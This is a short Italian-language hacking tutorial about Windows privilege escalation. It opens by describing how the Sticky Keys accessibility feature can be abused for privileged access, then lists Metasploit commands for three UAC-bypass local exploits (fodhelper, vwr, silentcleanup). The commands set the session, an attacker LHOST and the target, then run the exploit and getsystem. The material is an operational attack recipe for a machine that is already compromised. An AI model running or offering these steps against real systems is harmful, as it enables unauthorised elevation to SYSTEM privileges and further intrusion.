tags: bypass_UAC phishing Sticky_Keys metasploit
I tasti permanenti (Sticky Keys) sono una funzionalità di accessibilità di Windows che fa sì che i tasti modificatori rimangano attivi, anche dopo essere stati rilasciati. I tasti permanenti aiutano gli utenti che hanno difficoltà a premere combinazioni di tasti di scelta rapida. Possono essere abilitati premendo il tasto Maiusc per 5 volte. I tasti permanenti possono anche essere utilizzati per ottenere un accesso privilegiato non autenticato alla macchina.
Exploit bypassuac_fodhelper

Puoi utilizzare l’exploit use exploit/windows/local/bypassuac_fodhelper, si presuppone che tu abbia già accesso alla macchina quindi avendo una sessione in background puoi caricare questo payload tramite il comando set session 1:

set LHOST <indirizzo IP attaccante>
set TARGET 0 Serve ad indicare ce l’obbiettivo è lo stesso della sessione.

Digita getsystem -t 1 per elevare i privilegi.

Bypassuac_vwr
use exploit/windows/local/bypassuac_ vwr
Exploit bypassuac_silentcleanup
use exploit/windows/local/bypassuac_silentcleanup
set session 1

set LHOST <indirizzo IP attaccante>
set TARGET 0
exploit
getsystem -t 1
